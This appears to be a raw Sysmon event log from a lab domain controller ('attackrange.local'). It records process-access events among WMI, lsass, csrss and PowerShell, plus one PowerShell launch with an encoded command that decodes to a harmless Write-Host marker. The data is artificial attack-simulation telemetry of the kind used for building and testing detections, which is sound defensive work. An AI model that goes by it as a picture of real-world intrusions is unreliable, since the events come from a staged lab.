16:53:45.295{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002239543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.295{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002239542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.300{05ADC7E1-6D99-603E-ABAA-00000000AD01}16164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe /NoProfile /EncodedComman VwByAGkAdABlAC0ASABvAHMAdAAgAGYAYgAwADYAMQA2ADMANgAtADUAMgA4AGIALQA0ADgANQBmAC0AYQA4ADMANwAtADEAMgA4ADAAMQA5ADMANgA1ADIAMABlAA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002239541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.275{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-AAAA-00000000AD01}14736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.275{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A9AA-00000000AD01}6956C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.274{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A8AA-00000000AD01}13600C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.273{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.273{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A6AA-00000000AD01}15836C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.272{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D98-603E-A5AA-00000000AD01}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.270{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-35AA-00000000AD01}14828C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.270{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CB1-603E-34AA-00000000AD01}11696C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.269{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CAF-603E-33AA-00000000AD01}8188C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.268{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239530Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.268{05ADC7E1-229D-6039-0B00-00000000AD01}85210068C:\Windows\system32\lsass.exe{05ADC7E1-6D99-603E-A7AA-00000000AD01}11336C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002239529Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.268{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64FC-603E-3AA9-00000000AD01}15352C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239528Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.268{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-64C0-603E-31A9-00000000AD01}7648C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002239527Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:45.267{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\W